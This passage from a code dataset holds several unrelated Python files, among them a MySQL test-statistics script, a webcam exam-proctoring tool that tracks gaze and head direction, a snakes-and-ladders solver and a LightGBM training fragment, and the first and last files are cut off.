print(\"HEI\" + str(self.output_activations))\n        for i in range(0, 2):\n            self.output_activations[i] = (\\\n            1/(1 + np.exp(-self.beta * self.output_activations[i])))\n\n        print(\"Inputs: \" + str(self.inputs))\n        print(\"Hiddens: \" + str(self.hidden_activations))\n        print(\"Outputs: \" + str(self.output_activations))\n        print(\"InputW: \" + str(self.input_weights))\n        print(\"HiddenW: \" + str(self.hidden_weights))\n        print(\"\")\n\n        return inputKopi, hiddenKopi\n\ndef main():\n    inputs = [0, 1]\n    target = [1, 0]\n    test(inputs, target, 2)\n\nmain()\n","sub_path":"Third_year/Python/Oblig2/code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"207939498","text":"\nimport sys\nimport math\nimport mysql.connector\nfrom mysql.connector import errorcode\nimport csv\nfrom sys import *\n\n#Import the db_connections module\nimport platform as pf\nimport re\n\nos = pf.platform()\nif re.match(r'Windows.*', os):\n    path.append('C:\\\\Users\\\\EMAAHAF\\\\Documents\\\\TestOptimization_Ericsson\\\\DBS_connections')\nelse:\n    path.append('/repo/ezhuyui/test_optimizatoin_research/data_loading_module')\nimport DBS_connection_dictonaries as dc\n\n##-------------------------------------------------\n\ndef copy_table(area, site):\n    if(site == 'ALL'):\n        site = ''\n    else:\n        site = \"_\" + site\n    table_name_area = \"tar_ctc_runs_\" + area + site\n    table_name_area_s = table_name_area + \"_S\"\n    dc.clean_up(table_name_area_s)\n\n    conn_local = dc.ini_db_connection(dc.ezh)\n    cur_local = conn_local.cursor()\n    try:\n        query = \"CREATE TABLE %s ( SeqID int(1) AUTO_INCREMENT, Tc_Name varchar(128) NOT NULL, TmHeadline varchar(250) NOT NULL, TmID varchar(13), F_alarm int(1) DEFAULT 0, G_alarm int(1) DEFAULT 0, T_alarm int(1) DEFAULT 0, T_run int(1) DEFAULT 0, T_TR int(1) DEFAULT 0, Alarm_rate float DEFAULT 0, G_alarm_rate float DEFAULT 0, F_alarm_rate float DEFAULT 0, Precision_ float DEFAULT 0, Recall float DEFAULT 0, PRIMARY KEY (SeqID))\"%(table_name_area_s)\n        cur_local.execute(query)\n        \n        query = \"INSERT INTO %s (Tc_Name, TmHeadline, TmID) SELECT ThcTcJavaName, TmHeadline, TmID FROM %s b GROUP BY b.ThcTcJavaName, b.TmID, b.TmHeadline\"%(table_name_area_s, table_name_area)\n        cur_local.execute(query)\n        \n        query = \"UPDATE %s a, (SELECT ThcTcJavaName, TmHeadline, TmID, COUNT(*) c FROM %s WHERE verdict = 'FAIL' AND trID IS NULL GROUP BY ThcTcJavaName, TmID, TmHeadline) b SET a.F_alarm = b.c WHERE a.Tc_Name = b.ThcTcJavaName AND a.TmID 
= b.TmID AND a.TmHeadline = b.TmHeadline\"%(table_name_area_s, table_name_area)\n        cur_local.execute(query)\n        \n        query = \"UPDATE %s a, (SELECT ThcTcJavaName, TmHeadline, TmID, COUNT(*) c FROM %s WHERE verdict = 'FAIL' AND trID IS NOT NULL GROUP BY ThcTcJavaName, TmID, TmHeadline) b SET a.G_alarm = b.c WHERE a.Tc_Name = b.ThcTcJavaName AND a.TmID = b.TmID AND a.TmHeadline = b.TmHeadline\"%(table_name_area_s, table_name_area)\n        cur_local.execute(query)\n        \n        query = \"UPDATE %s a, (SELECT ThcTcJavaName, TmHeadline, TmID, COUNT(*) c FROM %s WHERE verdict = 'FAIL' GROUP BY ThcTcJavaName, TmID, TmHeadline) b SET a.T_alarm = b.c WHERE a.Tc_Name = b.ThcTcJavaName AND a.TmID = b. TmID AND a.TmHeadline = b.TmHeadline\"%(table_name_area_s, table_name_area)\n        cur_local.execute(query)\n        \n        query = \"UPDATE %s a, (SELECT ThcTcJavaName, TmHeadline, TmID, COUNT(*) c FROM %s GROUP BY ThcTcJavaName, TmID, TmHeadline) b SET a.T_run = b.c WHERE a.Tc_Name = b.ThcTcJavaName AND a.TmID = b.TmID AND a.TmHeadline = b.TmHeadline\"%(table_name_area_s, table_name_area)\n        cur_local.execute(query)\n        \n        query = \"UPDATE %s a, (SELECT ThcTcJavaName, TmHeadline, TmID, COUNT(*) c FROM %s WHERE Trid IS NOT NULL GROUP BY ThcTcJavaName, TmID, TmHeadline) b SET a.T_TR = b.c WHERE a.Tc_Name = b.ThcTcJavaName AND a.TmID = b.TmID AND a.TmHeadline = b.TmHeadline\"%(table_name_area_s, table_name_area)\n        cur_local.execute(query)\n        \n        query = \"UPDATE %s a SET a.Alarm_rate = (a.T_alarm/a.T_run)\"%(table_name_area_s)\n        cur_local.execute(query)\n        query = \"UPDATE %s SET Alarm_rate = 0 WHERE Alarm_rate IS NULL\"%(table_name_area_s)\n        cur_local.execute(query)\n        \n        query = \"UPDATE %s a SET a.G_alarm_rate = (a.G_alarm/a.T_alarm)\"%(table_name_area_s)\n        cur_local.execute(query)\n        query = \"UPDATE %s SET G_alarm_rate = 0 WHERE G_alarm_rate IS NULL\"%(table_name_area_s)\n        cur_local.execute(query)\n        \n        query = \"UPDATE %s a SET a.F_alarm_rate = (a.F_alarm/a.T_alarm)\"%(table_name_area_s)\n        cur_local.execute(query)\n        query = \"UPDATE %s SET F_alarm_rate = 0 WHERE F_alarm_rate IS NULL\"%(table_name_area_s)\n        cur_local.execute(query)\n        \n        query = \"UPDATE %s a SET a.Precision_ = (a.G_alarm/a.T_alarm)\"%(table_name_area_s)\n        cur_local.execute(query)\n        query = \"UPDATE %s SET Precision_ = 0 WHERE Precision_ IS NULL\"%(table_name_area_s)\n        cur_local.execute(query)\n        \n        query = \"UPDATE %s a, (SELECT SUM(G_alarm) s FROM %s) b SET a.Recall = (a.G_alarm / b.s)\"%(table_name_area_s, table_name_area_s)\n        cur_local.execute(query)\n        query = \"UPDATE %s SET Recall = 0 WHERE Recall IS NULL\"%(table_name_area_s)\n        cur_local.execute(query)\n        \n        \n    except mysql.connector.Error as err:\n        if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n            print(\"Something is wrong with your user name or password\")\n        elif err.errno == errorcode.ER_BAD_DB_ERROR:\n            print(\"Database does not exist\")\n        else:\n            print(err)\n    \nif __name__ == \"__main__\":\n    print(argv[1])\n    print(argv[2])\n    copy_table(argv[1],argv[2])","sub_path":"pyscripts/pyscripts_old/Area_test_stats/calculate_stats.py","file_name":"calculate_stats.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"500300557","text":"import cv2\nimport numpy as np\nimport dlib\nfrom math import hypot\nimport face_recognition\nimport time\nfrom datetime import datetime\nimport os\n\n\"\"\" global variables\n\"\"\"\nnum_frames = 0\nshort_cheating_count = 0\nlong_cheating_count = 0\n\nis_time_counting_eye = False   # for timing how long the eyes stay off target\nis_time_counting_head = False  # for timing how long the head stays off target\nis_face_compared = False       # whether identity verification has been done\n\nstart_time_eye = 0\nstart_time_head = 0\ncriteria_frame_num = 5\nwarning_count = 1\ncause = 0   # 1 : eyes right\n            # 2 : eyes left\n            # 3 : head right\n            # 4 : head left\n            # 5 : face not visible\n            # 6 : identification result\n            # 7 : multiple faces\n\nno_face_time = 10       # how many seconds without a detected face before warning\nmax_short_cheating = 5  # number of short-duration cheating incidents allowed\nmax_long_cheating = 1   # number of long-duration cheating incidents allowed\ncriteria_time = 5       # threshold in seconds separating short from long incidents\n\npath = \"C:/ArgosAjou/\"\npath_identification = \"C:/ArgosAjou/identification.txt\"\nfilename = \"video_\"\n\n\n\n\"\"\" determine mid point\n\"\"\"\ndef midpoint(p1, p2):\n    return int((p1.x + p2.x) / 2), int((p1.y + p2.y) / 2)\n\n\n\n\"\"\" Detect face & eye's location\n    and blinking\n\"\"\"\ndef get_blinking_ratio(facial_landmarks):\n    left_point1 = (facial_landmarks.part(36).x, facial_landmarks.part(36).y)\n    right_point1 = (facial_landmarks.part(39).x, facial_landmarks.part(39).y)\n    center_top1 = midpoint(facial_landmarks.part(37), facial_landmarks.part(38))\n    center_bottom1 = midpoint(facial_landmarks.part(41), facial_landmarks.part(40))\n\n    left_point2 = (facial_landmarks.part(42).x, facial_landmarks.part(42).y)\n    right_point2 = (facial_landmarks.part(45).x, facial_landmarks.part(45).y)\n    center_top2 = midpoint(facial_landmarks.part(43), facial_landmarks.part(44))\n    center_bottom2 = midpoint(facial_landmarks.part(47), facial_landmarks.part(46))\n\n    ver_line_len1 = hypot((center_top1[0] - center_bottom1[0]), (center_top1[1] - center_bottom1[1]))\n    hor_line_len1 = hypot((left_point1[0] - right_point1[0]), (left_point1[1] - right_point1[1]))\n    ver_line_len2 = hypot((center_top2[0] - center_bottom2[0]), (center_top2[1] - center_bottom2[1]))\n    hor_line_len2 = hypot((left_point2[0] - right_point2[0]), (left_point2[1] - right_point2[1]))\n\n    blink_ratio_left = hor_line_len1 / ver_line_len1\n    blink_ratio_right = hor_line_len2 / ver_line_len2\n    blink_ratio = (blink_ratio_left + blink_ratio_right) / 2\n\n    return blink_ratio\n\n\n\n\"\"\"Print face's area\n\"\"\"\ndef print_face(facial_landmarks, _gray, _frame):\n    face_region = np.array([(facial_landmarks.part(0).x, facial_landmarks.part(0).y),\n                            (facial_landmarks.part(1).x, facial_landmarks.part(1).y),\n                            (facial_landmarks.part(2).x, facial_landmarks.part(2).y),\n                            (facial_landmarks.part(3).x, facial_landmarks.part(3).y),\n                            (facial_landmarks.part(4).x, facial_landmarks.part(4).y),\n                            (facial_landmarks.part(5).x, facial_landmarks.part(5).y),\n                            (facial_landmarks.part(6).x, facial_landmarks.part(6).y),\n                            (facial_landmarks.part(7).x, facial_landmarks.part(7).y),\n                            (facial_landmarks.part(8).x, facial_landmarks.part(8).y),\n                            (facial_landmarks.part(9).x, facial_landmarks.part(9).y),\n                            (facial_landmarks.part(10).x, facial_landmarks.part(10).y),\n                            (facial_landmarks.part(11).x, facial_landmarks.part(11).y),\n                            (facial_landmarks.part(12).x, facial_landmarks.part(12).y),\n                            (facial_landmarks.part(13).x, facial_landmarks.part(13).y),\n                            (facial_landmarks.part(14).x, facial_landmarks.part(14).y),\n                            (facial_landmarks.part(15).x, facial_landmarks.part(15).y),\n                            (facial_landmarks.part(16).x, facial_landmarks.part(16).y),\n                            (facial_landmarks.part(18).x, facial_landmarks.part(18).y),\n                            (facial_landmarks.part(23).x, facial_landmarks.part(23).y)], np.int32)\n\n    cv2.polylines(_frame, [face_region], True, (0, 255, 255), 1)\n\n\n\n\"\"\" Detect eye's gazing\n\"\"\"\ndef get_gaze_ratio(eye_points, facial_landmarks, _gray, _frame):\n    
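# outline the eye from its six landmarks, threshold the masked region, and\n    # compare white-pixel counts on the left/right halves to locate the pupil\n    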
eye_region = np.array([(facial_landmarks.part(eye_points[0]).x, facial_landmarks.part(eye_points[0]).y),\n                           (facial_landmarks.part(eye_points[1]).x, facial_landmarks.part(eye_points[1]).y),\n                           (facial_landmarks.part(eye_points[2]).x, facial_landmarks.part(eye_points[2]).y),\n                           (facial_landmarks.part(eye_points[3]).x, facial_landmarks.part(eye_points[3]).y),\n                           (facial_landmarks.part(eye_points[4]).x, facial_landmarks.part(eye_points[4]).y),\n                           (facial_landmarks.part(eye_points[5]).x, facial_landmarks.part(eye_points[5]).y)], np.int32)\n\n    cv2.polylines(_frame, [eye_region], True, (0, 255, 255), 1)\n\n    height, width, _ = _frame.shape\n    mask = np.zeros((height, width), np.uint8)\n    cv2.polylines(mask, [eye_region], True, 255, 1)\n    cv2.fillPoly(mask, [eye_region], 255)\n    eye = cv2.bitwise_and(_gray, _gray, mask=mask)\n\n    min_x = np.min(eye_region[:, 0])\n    max_x = np.max(eye_region[:, 0])\n    min_y = np.min(eye_region[:, 1])\n    max_y = np.max(eye_region[:, 1])\n\n    gray_eye = eye[min_y: max_y, min_x: max_x]\n    _, threshold_eye = cv2.threshold(gray_eye, 70, 255, cv2.THRESH_BINARY)\n\n    # estimate the gaze direction from the white area of the thresholded eye\n    height, width = threshold_eye.shape\n    left_side_threshold = threshold_eye[0: height, 0: int(width / 2)]\n    left_side_white = cv2.countNonZero(left_side_threshold)\n    right_side_threshold = threshold_eye[0: height, int(width / 2): width]\n    right_side_white = cv2.countNonZero(right_side_threshold)\n\n    # cv2.imshow(\"left\", left_side_threshold)\n    # cv2.imshow(\"right\", right_side_threshold)\n\n    # if the left or right white count is below 5, treat the eye as closed\n    if left_side_white < 5 or right_side_white < 5:\n        _gaze_ratio = 1\n    else:\n        _gaze_ratio = left_side_white / right_side_white\n\n    return _gaze_ratio\n\n\n\n\"\"\" Detect head's direction\n\"\"\"\ndef get_head_angle_ratio(head_points, facial_landmarks, _frame):\n    # draw the horizontal line of the nose\n    nose_region1 = np.array([(facial_landmarks.part(head_points[0]).x, facial_landmarks.part(head_points[0]).y),\n                             (facial_landmarks.part(head_points[1]).x, facial_landmarks.part(head_points[1]).y),\n                             (facial_landmarks.part(head_points[2]).x, facial_landmarks.part(head_points[2]).y),\n                             (facial_landmarks.part(head_points[3]).x, facial_landmarks.part(head_points[3]).y)],\n                            np.int32)\n    cv2.polylines(_frame, [nose_region1], True, (0, 255, 255), 1)\n\n    # draw the vertical line of the nose\n    nose_region2 = np.array([(facial_landmarks.part(head_points[4]).x, facial_landmarks.part(head_points[4]).y),\n                             (facial_landmarks.part(head_points[5]).x, facial_landmarks.part(head_points[5]).y),\n                             (facial_landmarks.part(head_points[6]).x, facial_landmarks.part(head_points[6]).y),\n                             (facial_landmarks.part(head_points[7]).x, facial_landmarks.part(head_points[7]).y),\n                             (facial_landmarks.part(head_points[8]).x, facial_landmarks.part(head_points[8]).y)],\n                            np.int32)\n    cv2.polylines(_frame, [nose_region2], True, (0, 255, 255), 1)\n\n    # draw the left reference line of the nose\n    nose_line_left = np.array([(facial_landmarks.part(head_points[3]).x, facial_landmarks.part(head_points[3]).y),\n                               (facial_landmarks.part(head_points[4]).x, facial_landmarks.part(head_points[4]).y)],\n                              np.int32)\n    cv2.polylines(_frame, [nose_line_left], True, (255, 0, 255), 1)\n\n    # draw the right reference line of the nose\n    nose_line_right = np.array([(facial_landmarks.part(head_points[3]).x, facial_landmarks.part(head_points[3]).y),\n                                (facial_landmarks.part(head_points[8]).x, facial_landmarks.part(head_points[8]).y)],\n                               np.int32)\n    cv2.polylines(_frame, [nose_line_right], True, (255, 0, 255), 1)\n\n    nose_left_point = (facial_landmarks.part(head_points[4]).x, facial_landmarks.part(head_points[4]).y)\n    nose_right_point = (facial_landmarks.part(head_points[8]).x, 
facial_landmarks.part(head_points[8]).y)\n    nose_center_point = (facial_landmarks.part(head_points[3]).x, facial_landmarks.part(head_points[3]).y)\n\n    # compute the lengths of the right and left reference lines\n    nose_line_len1 = hypot(nose_left_point[0] - nose_center_point[0], nose_left_point[1] - nose_center_point[1])\n    nose_line_len2 = hypot(nose_right_point[0] - nose_center_point[0], nose_right_point[1] - nose_center_point[1])\n\n    if nose_line_len1 > nose_line_len2:\n        _head_direction = \"right\"\n        _direction_ratio = nose_line_len1 / nose_line_len2\n    else:\n        _head_direction = \"left\"\n        _direction_ratio = nose_line_len2 / nose_line_len1\n\n    return _head_direction, _direction_ratio\n\n\n\n\"\"\" Compare faces\n\"\"\"\n\ndef compare_faces(_frame, _num_faces, _temp_faces_for_compare):\n    global path, is_face_compared\n\n    if _num_faces == 1:\n        _temp_faces_for_compare = (0, 0)\n        imgS = cv2.cvtColor(_frame, cv2.COLOR_BGR2RGB)\n        faceLocation = face_recognition.face_locations(imgS)\n        encodedCurFrame = face_recognition.face_encodings(imgS, faceLocation)\n        _temp_faces_for_compare = (faceLocation, encodedCurFrame, True)\n\n        return _temp_faces_for_compare\n\n    elif _num_faces == 2:\n        imgS = cv2.cvtColor(_frame, cv2.COLOR_BGR2RGB)\n        faceLocation = face_recognition.face_locations(imgS)\n        encodedCurFrame = face_recognition.face_encodings(imgS, faceLocation)\n\n        matches = face_recognition.compare_faces((_temp_faces_for_compare[1])[0], encodedCurFrame)\n        distance = face_recognition.face_distance((_temp_faces_for_compare[1])[0], encodedCurFrame)\n        if distance[0] == 0:\n            try:\n                distance = distance[1]\n            except Exception:\n                distance = 0\n        else:\n            distance = distance[0]\n\n        print(distance)\n\n\n        s = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n        f = open(path + filename + s + \".txt\", 'w')\n        f.write(\"identification match probability : {:.2f}% + 7\".format((1-distance)*100))\n        f.close()\n\n        _temp_faces_for_compare = (None, None, False)\n        print(\"*** identification SUCCESS ***\\n\\n\")\n        print(\"         LOADING . . . 
\\n\\n\")\n cv2.destroyAllWindows()\n time.sleep(3)\n print(\"*** eyetracking ACTIVATED ***\")\n\n is_face_compared = True\n\n return _temp_faces_for_compare\n\n\n\n\"\"\" Set criteria\n\"\"\"\ndef set_criteria(_direction, _head_direction_sum, _criteria_finished, _direction_ratio, _eye_direction_sum):\n\n global criteria_frame_num, num_frames\n\n _head_direction_criteria = 0\n _eye_direction_criteria = 0\n\n num_frames += 1\n if _direction == \"left\" and (not _criteria_finished):\n _head_direction_sum += (_direction_ratio - 1) * (-1)\n # print(head_direction_sum)\n elif _direction == \"right\" and (not _criteria_finished):\n _head_direction_sum += (_direction_ratio - 1)\n # print(head_direction_sum)\n\n if num_frames == criteria_frame_num:\n _head_direction_criteria = (_head_direction_sum / num_frames)\n print(\"HEAD : {}\".format(_head_direction_criteria))\n _criteria_finished = True\n\n if num_frames == criteria_frame_num:\n _eye_direction_criteria = (_eye_direction_sum / num_frames)\n print(\"EYE : {}\".format(_eye_direction_criteria))\n\n return _head_direction_criteria, _eye_direction_criteria, _criteria_finished, num_frames\n\n\n\ndef warn_eye_direction(_criteria_finished, _gaze_ratio, _eye_direction_criteria, _margin_eye):\n\n global is_time_counting_eye, start_time_eye, cause\n\n # 숫자가 작아질수록 관대\n if _criteria_finished and _gaze_ratio < _eye_direction_criteria - _margin_eye:\n if not is_time_counting_eye:\n start_time_eye = time.time()\n is_time_counting_eye = True\n print(\"시간 계산중...\")\n cause = 2\n #print(\"눈동자 왼쪽으로 벗어남\")\n #print(_gaze_ratio)\n\n # 숫자가 커질수록 관대\n elif _criteria_finished and _gaze_ratio > _eye_direction_criteria + _margin_eye:\n if not is_time_counting_eye:\n start_time_eye = time.time()\n is_time_counting_eye = True\n print(\"시간 계산중...\")\n cause = 1\n #print(\"눈동자 오른쪽으로 벗어남\")\n #print(_gaze_ratio)\n\n else:\n if is_time_counting_eye:\n print(\"종료[e]\")\n duration = time.time() - start_time_eye\n print(\"duration : {}\".format(duration))\n count_cheating(duration, cause)\n is_time_counting_eye = False\n time.sleep(1)\n\n\n\"\"\" Head angle warning algorithm\n\"\"\"\ndef warn_head_direction(_criteria_finished, _head_direction_criteria, _head_direction, _margin_head):\n global start_time_head, is_time_counting_head, cause\n\n # 왼쪽 바라볼때\n if _criteria_finished and _head_direction_criteria < 0:\n if _head_direction[0] == \"left\" and _head_direction[1] > 1 - _head_direction_criteria + _margin_head:\n if not is_time_counting_head:\n start_time_head = time.time()\n is_time_counting_head = True\n print(\"시간 계산중...\")\n cause = 4\n #print(\"고개 왼쪽으로 벗어남\")\n #print(_head_direction)\n\n elif _head_direction[0] == \"right\" and _head_direction[1] > 1 + _head_direction_criteria + _margin_head:\n if not is_time_counting_head:\n start_time_head = time.time()\n is_time_counting_head = True\n print(\"시간 계산중...\")\n cause = 3\n #print(\"고개 오른쪽으로 벗어남\")\n #print(_head_direction)\n\n else:\n if is_time_counting_head:\n print(\"종료[h]\")\n duration = time.time() - start_time_head\n print(\"duration : {}\".format(duration))\n count_cheating(duration, cause)\n is_time_counting_head = False\n time.sleep(1)\n\n # 오른쪽 바라볼때\n if _criteria_finished and _head_direction_criteria >= 0:\n if _head_direction[0] == \"left\" and _head_direction[1] > 1 - _head_direction_criteria + _margin_head:\n if not is_time_counting_head:\n start_time_head = time.time()\n is_time_counting_head = True\n print(\"시간 계산중...\")\n cause = 4\n #print(\"고개 왼쪽으로 벗어남\")\n #print(_head_direction)\n\n elif 
_head_direction[0] == \"right\" and _head_direction[1] > 1 + _head_direction_criteria + _margin_head:\n            if not is_time_counting_head:\n                start_time_head = time.time()\n                is_time_counting_head = True\n                print(\"counting time...\")\n            cause = 3\n            #print(\"head deviated to the right\")\n            #print(_head_direction)\n\n        else:\n            if is_time_counting_head:\n                print(\"done [h]\")\n                duration = time.time() - start_time_head\n                print(\"duration : {}\".format(duration))\n                count_cheating(duration, cause)\n                is_time_counting_head = False\n                time.sleep(1)\n\n\n\n\"\"\" count the cheating frequency\n\"\"\"\ndef count_cheating(_duration, _cause):\n    global short_cheating_count, long_cheating_count, warning_count, \\\n        max_long_cheating, max_short_cheating, criteria_time, filename, path\n\n    if _duration < criteria_time:\n        short_cheating_count += 1\n\n    elif _duration >= criteria_time:\n        long_cheating_count += 1\n\n\n    if short_cheating_count == max_short_cheating:\n        s = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n        f = open(path + filename + s + \".txt\", 'w')\n        warning_count += 1\n        f.write(\"5 short warnings accumulated + \" + str(_cause))\n        f.close()\n        print(\"5 short warnings accumulated\")\n        short_cheating_count = 0\n\n    if long_cheating_count == max_long_cheating:\n        print(\"1 long warning accumulated!\")\n        s = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n        f = open(path + filename + s + \".txt\", 'w')\n        warning_count += 1\n        f.write(\"1 long warning accumulated + \" + str(_cause))\n        f.close()\n        long_cheating_count = 0\n\n\n\"\"\" detect no faces warning\n\"\"\"\ndef warn_no_face(_duration):\n    global no_face_time, max_long_cheating, max_short_cheating, warning_count, filename, path\n\n    if _duration > no_face_time:\n        print(\"warning: no face detected\")\n        s = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n        f = open(path + filename + s + \".txt\", 'w')\n        warning_count += 1\n        f.write(\"warning: no face detected for {:.1f} seconds + 5\".format(_duration))\n        f.close()\n\n\"\"\" detect multiple faces warning\n\"\"\"\ndef warn_many_faces(_num_faces, _left_frame):\n    global no_face_time, max_long_cheating, max_short_cheating, warning_count, filename, path\n\n    if _num_faces >= 2:\n        s = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n        f = open(path + filename + s + \".txt\", 'w')\n        f.write(\"two or more faces detected + 7\")\n        print(\"two or more faces detected\")\n        f.close()\n        return 0\n\n    else:\n        return _left_frame\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\"\"\"\"\"      # MAIN FUNCTION #      \"\"\"\"\"\"\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\ndef main():\n    global num_frames, is_face_compared\n\n    cap = cv2.VideoCapture(0)\n    detector = dlib.get_frontal_face_detector()\n    predictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\n\n    # whether face recognition is activated\n    Activated = False\n\n    # variables for face recognition\n    temp_faces_for_compare = (None, None, Activated)\n    start_time_face = 0\n\n    # variables for setting the initial head/eye direction baseline\n    head_direction_sum = 0\n    eye_direction_sum = 0\n    head_direction_criteria = 0\n    eye_direction_criteria = 0\n\n    # whether the initial head/eye baseline has been set\n    criteria_finished = False\n\n    # margin for eye direction detection (lower = stricter)\n    margin_eye = 2.3\n    margin_head = 0.7\n\n    # variable for the multiple-faces check\n    left_frame = 100\n\n    while True:\n        _, frame = cap.read()\n        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n        faces = detector(gray)\n        num_faces = 0\n\n        # face detection part\n        for face in faces:\n            num_faces += 1\n            landmarks = predictor(gray, face)\n\n            # identity verification part (runs if is_face_compared is not yet set)\n            if not is_face_compared and not temp_faces_for_compare[2]:\n                temp_faces_for_compare = (0, 0, True)\n\n            # warn if no face has been detected for a while\n            duration = time.time() - start_time_face\n            
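# reset the reference time; warn_no_face() fires when the gap between\n            # detected faces exceeds no_face_time seconds\n            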
start_time_face = time.time()\n\n            if not num_frames == 0:\n                warn_no_face(duration)\n\n            \"\"\"\n            # detect blinking while tracking the eyes\n            if get_blinking_ratio(landmarks) > 3.7:  # the higher the number, the stricter the detection\n            \"\"\"\n\n            # detect the gaze direction\n            # right -> the ratio grows / left -> it shrinks\n            gaze_ratio_left_eye = get_gaze_ratio([36, 37, 38, 39, 40, 41], landmarks, gray, frame)\n            gaze_ratio_right_eye = get_gaze_ratio([42, 43, 44, 45, 46, 47], landmarks, gray, frame)\n            gaze_ratio = (gaze_ratio_left_eye + gaze_ratio_right_eye) / 2\n            eye_direction_sum += gaze_ratio\n            #print(gaze_ratio)\n\n            # detect which way the head is turned\n            head_direction = get_head_angle_ratio([27, 28, 29, 30, 31, 32, 33, 34, 35], landmarks, frame)\n            direction = head_direction[0]\n            direction_ratio = head_direction[1]\n\n            # warn when the eyes leave the allowed range\n            warn_eye_direction(criteria_finished, gaze_ratio, eye_direction_criteria, margin_eye)\n\n            # warn when the head leaves the allowed range\n            warn_head_direction(criteria_finished, head_direction_criteria, head_direction, margin_head)\n\n            # warn when two or more faces are detected on the webcam\n            if is_face_compared and left_frame > 100:\n                left_frame = warn_many_faces(num_faces, left_frame)\n            left_frame += 1\n\n            # set the head/eye baseline over the first 100 frames\n            if not criteria_finished and is_face_compared:\n                head_direction_criteria, eye_direction_criteria, criteria_finished, num_frames \\\n                    = set_criteria(direction, head_direction_sum,\n                                   criteria_finished, direction_ratio, eye_direction_sum)\n\n            # identity verification via the face\n            if temp_faces_for_compare[2]:\n                temp_faces_for_compare = compare_faces(frame, num_faces, temp_faces_for_compare)\n\n\n\n        # Print on the screen\n        if temp_faces_for_compare[2]:\n            cv2.imshow(\"Frame\", frame)\n            key = cv2.waitKey(1)\n        else:\n            key = cv2.waitKey(1)\n            cv2.destroyAllWindows()\n\n        # exit the program when ESC is pressed\n        if key == 27:\n            break\n\n    cap.release()\n    cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n    main()\n\n# an error occurs if identification runs immediately","sub_path":"eyetracking2/practice1.py","file_name":"practice1.py","file_ext":"py","file_size_in_byte":22180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"33659148","text":"if __name__ == '__main__':\n    for _ in range(int(input())):\n        board = [i for i in range(0, 101)]\n        for _ in range(int(input())):\n            pos_ini, pos_end = list(map(int, input().split()))\n            board[pos_ini] = pos_end\n        for _ in range(int(input())):\n            pos_ini, pos_end = list(map(int, input().split()))\n            board[pos_ini] = pos_end\n\n        opened = [1]\n        path = {1: ()}\n        while opened:\n            cur = opened.pop()\n            p = path[cur] + (cur,)\n            for nex in range(cur + 1, cur + 7):\n                if nex > 100:\n                    break\n                nex = board[nex]\n                if nex not in path or len(path[nex]) > len(p):\n                    opened.append(nex)\n                    path[nex] = p\n        #for i in path:\n        #    print(i, \"can be reached in {} through {}\".format(len(path[i]), path[i]))\n        if 100 not in path:\n            print(-1)\n        else:\n            print(len(path[100]))\n","sub_path":"HackerRank/Algorithms/GraphTheory/snakesAndLadders/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"275785049","text":"def inserts(nums,dis,num):\n    out = []\n    if(len(nums)==0):out.append([dis,num])\n    else:\n        for i in range(len(nums)):\n            if(nums[i][0]>dis and i==0):\n                out.append([dis,num])\n                out.append(nums[i])\n                dis=0\n            elif( (i<len(nums)-1 and nums[i+1][0]>=dis)\n                  or ( i==len(nums)-1 and dis!=0 ) ):\n                out.append(nums[i])\n                out.append([dis,num])\n                dis=0\n            else:\n                out.append(nums[i])\n    return out\n\nnums = eval(input())\nk = int(input())\nout = []\nfor i in nums:\n    out = 
inserts(out,(i[0]**2+i[1]**2),i)\nprint(out[k-1][1])","sub_path":"Code/CodeRecords/2504/60642/292815.py","file_name":"292815.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"255420093","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 21 09:52:40 2017\r\nget output predictions for the test data\r\n@author: Li Ruosong\r\n\"\"\"\r\nprint (\"Train test and validation sets\")\r\n\r\ntrain_label = train['target'].values \r\ntrain = train.drop(['target'], axis=1)\r\n\r\n\r\n\r\n\r\nids = test['id'].values\r\ntest = test.drop(['id'], axis=1)\r\n\r\nfor col in train.columns: \r\n    train[col] = train[col].astype('category')\r\n    test[col] = test[col].astype('category')\r\n\r\nd_train=lgb.Dataset(train,train_label)\r\nd_val=lgb.Dataset(train.iloc[5000000:],train_label[5000000:])\r\n#transfer features into category type\r\n\r\n \r\n\r\n\r\nparams = {\r\n    'objective': 'binary',\r\n    \r\n    'boosting': 'gbdt',\r\n    'learning_rate':0.22,\r\n    'lambda_l2': 0.0005,\r\n    'verbose': 0,\r\n    'num_leaves': 3000,\r\n    'bagging_fraction': 0.95,\r\n    'bagging_freq': 1,\r\n    'bagging_seed': 1,\r\n    'feature_fraction': 0.9,\r\n    'feature_fraction_seed': 1,\r\n    'max_bin': 5000,\r\n    'max_depth': 30,\r\n    'num_rounds': 200,\r\n    'metric' : 'auc'\r\n    }\r\n\r\n#%time \r\nmodel_f1 = lgb.train(params, train_set=d_train, valid_sets=d_val,verbose_eval=1)\r\n\r\nm1_feature_importance=pd.DataFrame(model_f1.feature_importance(),index=train.columns)\r\n\r\nparams = {\r\n    'objective': 'binary',\r\n    \r\n    'boosting': 'dart',\r\n    'learning_rate':0.22,\r\n    'lambda_l2': 0.0005,\r\n    'verbose': 0,\r\n    'num_leaves': 800,\r\n    